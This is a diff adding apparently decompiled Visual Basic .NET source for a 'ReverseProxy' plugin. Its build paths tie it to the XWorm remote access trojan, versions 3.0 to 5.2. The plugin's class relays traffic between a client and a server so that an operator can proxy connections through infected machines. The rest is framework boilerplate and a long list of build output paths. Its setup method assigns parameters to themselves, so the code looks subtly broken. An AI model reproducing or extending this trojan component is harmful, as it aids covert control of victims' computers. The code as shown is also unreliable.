<EmbeddedResource Include="My Project\Resources.resx">
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
<CustomToolNamespace>My.Resources</CustomToolNamespace>
<SubType>Designer</SubType>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="My Project\Application.myapp">
<Generator>MyApplicationCodeGenerator</Generator>
<LastGenOutput>Application.Designer.vb</LastGenOutput>
</None>
<None Include="My Project\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<CustomToolNamespace>My</CustomToolNamespace>
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
</None>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project>
@@ -0,0 +1,84 @@
Imports System
Imports System.Diagnostics
Imports System.Net.Sockets
Imports System.Threading
Namespace ReverseProxy
' Token: 0x0200000E RID: 14
Friend Class SSLReadWrite
' Token: 0x0600002F RID: 47 RVA: 0x00002DCC File Offset: 0x000011CC
<DebuggerNonUserCode()>
Public Sub New()
End Sub
' Token: 0x06000030 RID: 48 RVA: 0x00002DD8 File Offset: 0x000011D8
Public Sub StartSSLReadWriteThread(client As TcpClient, client_str As NetworkStream, server As TcpClient)
client = client
server = server
client_str = client_str
server_str = server.GetStream()
Dim thread As Thread = New Thread(AddressOf Client2Server)
thread.Start()
Dim thread2 As Thread = New Thread(AddressOf Server2Client)
thread2.Start()
End Sub
' Token: 0x06000031 RID: 49 RVA: 0x00002E3C File Offset: 0x0000123C
Private Sub Client2Server()
Try
Dim array As Byte() = New Byte(24576) {}
While ClientSocket.isConnected
Dim num As Integer = client_str.Read(array, 0, array.Length)
Dim flag As Boolean = num = 0
If flag Then
client_str.Close()
client.Close()
server.Close()
server_str.Close()
Exit While
End If
server_str.Write(array, 0, num)
server_str.Flush()
End While
Catch ex As Exception
client.Close()
server.Close()
End Try
End Sub
' Token: 0x06000032 RID: 50 RVA: 0x00002F08 File Offset: 0x00001308
Private Sub Server2Client()
Try
Dim array As Byte() = New Byte(24576) {}
While ClientSocket.isConnected
Dim num As Integer = server_str.Read(array, 0, array.Length)
Dim flag As Boolean = num = 0
If flag Then
client_str.Close()
client.Close()
server.Close()
server_str.Close()
Exit While
End If
client_str.Write(array, 0, num)
client_str.Flush()
End While
Catch ex As Exception
client.Close()
server.Close()
End Try
End Sub
' Token: 0x0400000E RID: 14
Private client As TcpClient
' Token: 0x0400000F RID: 15
Private server As TcpClient
' Token: 0x04000010 RID: 16
Private client_str As NetworkStream
' Token: 0x04000011 RID: 17
Private server_str As NetworkStream
End Class
End Namespace
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName:=".NET Framework 4.5")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
@@ -0,0 +1 @@
55cd0cd35fc09fefae110f46b5da88bdd0c401db3218a8754906eade388aca6a
@@ -0,0 +1,244 @@
c:\users\xcoder\documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.Cache
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\bin\Debug\ReverseProxy.dll
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\bin\Debug\ReverseProxy.pdb
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\bin\Debug\ReverseProxy.xml
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.pdb
C:\Users\XCoder\Documents\visual studio 2012\Projects\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\New folder (2)\XWorm V3.0 X64\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.0\XWorm V3.0\XWorm V3.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V3.2 Base64\XWorm V3.2 Base64\XWorm V3.2\XWorm V3.2\XWorm V3.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.AssemblyReference.cache
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
